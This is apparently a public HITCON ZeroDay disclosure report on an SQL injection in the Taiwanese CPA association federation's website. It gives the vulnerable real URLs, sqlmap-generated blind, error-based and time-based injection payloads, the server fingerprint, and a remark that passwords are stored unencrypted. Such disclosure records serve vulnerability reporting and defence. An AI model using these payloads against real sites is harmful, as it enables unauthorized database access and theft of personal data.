Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00413
- 發信 Vendor: 中華民國會計師公會全國聯合會
- Title: 中華民國會計師公會四公會聯合網站 資料庫注入漏洞
- Introduction: 資料庫注入
處理狀態
目前狀態
公開
Last Update : 2017/07/23
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2017/05/23 23:00:52 : 新提交 (由 更新此狀態)
- 2017/05/23 23:39:45 : 新提交 (由 更新此狀態)
- 2017/05/23 23:51:18 : 審核完成 (由 HITCON ZeroDay 平台自動更新)
- 2017/05/23 23:53:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/05/28 02:32:40 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/05/28 02:32:41 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/05/28 02:32:41 : 通報未回應 (由 HITCON ZeroDay 平台自動更新)
- 2017/07/23 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.roccpa.org.tw/news/?mode=data&id=3230
http://www.roccpa.org.tw/content/index.php?parent_id=41%27
http://www.roccpa.org.tw/download/index.php?type_id=1704%27
http://www.roccpa.org.tw/content/index.php?parent_id=41%27
http://www.roccpa.org.tw/download/index.php?type_id=1704%27
敘述
情境描述:
為了維護數位國土安全,為了守護台灣政府和平,貫徹黑與白色的意念,肥肥又宅宅的邊緣角色...
透過谷歌好朋友連進去時直接報錯,加單引號錯上加錯,整個大錯特錯,太錯辣!
神器大法:
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: mode=data&id=-4367 OR MAKE_SET(5206=5206,3734)
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: mode=data&id=3230 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162626b71,(SELECT (ELT(1283=1283,1))),0x71627a6a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mode=data&id=3230 AND SLEEP(5)[22:32:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL >= 5.5
[22:32:54] [INFO] fetched data logged to text files under '/Users/Yo/.sqlmap/output/www.roccpa.org.tw'
密碼沒加密哦..
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。